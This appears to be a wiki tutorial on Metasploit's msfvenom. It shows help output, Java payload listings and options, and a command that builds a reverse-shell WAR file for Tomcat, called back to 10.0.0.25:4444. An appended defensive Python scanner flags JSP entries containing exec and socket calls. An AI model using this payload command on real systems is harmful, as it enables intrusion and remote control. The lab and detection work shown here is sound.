From charlesreid1

msfvenom can be used to craft payloads such as remote TCP shells.

See this tool in action: Metasploitable/Apache/DAV

More info: https://sathisharthars.wordpress.com/tag/msfvenom/

And: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

Creating Payloads

Here's the help message for msfvenom:

root@morpheus:~# msfvenom -h
Error: MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
        --help-platforms             List available platforms
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

Also, a list of the different output formats that msfvenom is capable of producing:

root@morpheus:~# msfvenom --help-formats
Error: Executable formats
	asp, aspx, aspx-exe, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

Let's walk through the usage, so you can see how to fumble your way through using this tool.

Tomcat

To create a WAR file that would give a reverse shell, I used msfvenom to generate the payload.

I started by listing all the different payloads available, and looked for java-related payloads:

root@morpheus:~/box/besside# msfvenom -l payloads

Framework Payloads (437 total)
==============================

    Name                                                Description
    ----                                                -----------
    java/jsp_shell_bind_tcp                             Listen for a connection and spawn a command shell
    java/jsp_shell_reverse_tcp                          Connect back to attacker and spawn a command shell
    java/meterpreter/bind_tcp                           Run a meterpreter server in Java. Listen for a connection
    java/meterpreter/reverse_http                       Run a meterpreter server in Java. Tunnel communication over HTTP
    java/meterpreter/reverse_https                      Run a meterpreter server in Java. Tunnel communication over HTTPS
    java/meterpreter/reverse_tcp                        Run a meterpreter server in Java. Connect back stager
    java/shell/bind_tcp                                 Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection
    java/shell/reverse_tcp                              Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
    java/shell_reverse_tcp                              Connect back to attacker and spawn a command shell

You'll probably want to use java/jsp_shell_reverse_tcp or java/meterpreter/reverse_tcp.

jsp shell reverse tcp

Here are the options:

root@morpheus:~/box/besside# msfvenom -p java/jsp_shell_reverse_tcp --payload-options
Options for payload/java/jsp_shell_reverse_tcp:


       Name: Java JSP Command Shell, Reverse TCP Inline
     Module: payload/java/jsp_shell_reverse_tcp
   Platform: Linux, OSX, Solaris, Unix, Windows
       Arch: java
Needs Admin: No
 Total size: 0
       Rank: Normal

Provided by:
    sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
SHELL                   no        The system shell to use.

Description:
  Connect back to attacker and spawn a command shell


Advanced options for payload/java/jsp_shell_reverse_tcp:

    Name           : AutoRunScript
    Current Setting:
    Description    : A script to run automatically on session creation.

    Name           : InitialAutoRunScript
    Current Setting:
    Description    : An initial script to run on session creation (before
       AutoRunScript)

    Name           : ReverseAllowProxy
    Current Setting: false
    Description    : Allow reverse tcp even with Proxies specified. Connect back
       will NOT go through proxy but directly to LHOST

    Name           : ReverseConnectRetries
    Current Setting: 5
    Description    : The number of connection attempts to try before exiting the
       process

    Name           : ReverseListenerBindAddress
    Current Setting:
    Description    : The specific IP address to bind to on the local system

    Name           : ReverseListenerBindPort
    Current Setting:
    Description    : The port to bind to on the local system if different from LPORT

    Name           : ReverseListenerComm
    Current Setting:
    Description    : The specific communication channel to use for this listener

    Name           : ReverseListenerThreaded
    Current Setting: false
    Description    : Handle every connection in a new thread (experimental)

    Name           : VERBOSE
    Current Setting: false
    Description    : Enable detailed status messages

    Name           : WORKSPACE
    Current Setting:
    Description    : Specify the workspace for this module

Evasion options for payload/java/jsp_shell_reverse_tcp:

Ok, let's give it a whirl.

root@morpheus:~/box/besside# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.25 LPORT=4444 -f war > runme.war
Payload size: 1088 bytes
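A defender's counterpart to the WAR generated above, added here as an example that is not part of the original page: it scans a WAR archive for JSP entries containing process-execution or raw-socket calls, the tell-tale of a java/jsp_shell_reverse_tcp style payload dropped into Tomcat. The archive, its entry names, the JSP fragments and the token list are all constructed for illustration.

```python
import io
import re
import zipfile

# Constructed sample WAR contents (not real msfvenom output): one harmless JSP
# and one JSP carrying the API calls a reverse shell needs.
BENIGN_JSP = b'<html><body><%= "hello" %></body></html>'
SUSPICIOUS_JSP = (
    b'<%@page import="java.io.*,java.net.*"%>'
    b'<% Socket s = new Socket(host, port); '
    b'Process p = Runtime.getRuntime().exec(cmd); %>'
)

# Tokens an ordinary web application's JSP has little reason to contain.
RISKY_TOKENS = [
    rb"Runtime\.getRuntime\(\)\.exec",
    rb"ProcessBuilder",
    rb"new\s+Socket\(",
    rb"java\.net\.Socket",
]


def build_sample_war() -> bytes:
    """Build the constructed WAR in memory so the scan runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("index.jsp", BENIGN_JSP)
        zf.writestr("WEB-INF/web.xml", b"<web-app/>")
        zf.writestr("abcdef.jsp", SUSPICIOUS_JSP)  # random-looking name, like msfvenom's
    return buf.getvalue()


def scan_war(war_bytes: bytes) -> dict:
    """Return {entry_name: [matched token patterns]} for every JSP with risky calls."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".jsp", ".jspx")):
                continue
            data = zf.read(name)
            hits = [t.decode() for t in RISKY_TOKENS if re.search(t, data)]
            if hits:
                findings[name] = hits
    return findings


if __name__ == "__main__":
    for entry, hits in scan_war(build_sample_war()).items():
        print(f"{entry}: {', '.join(hits)}")
```

Pointing scan_war at the bytes of a real deployed WAR (webapps/*.war on a Tomcat host) gives the same report for the archives actually on the server.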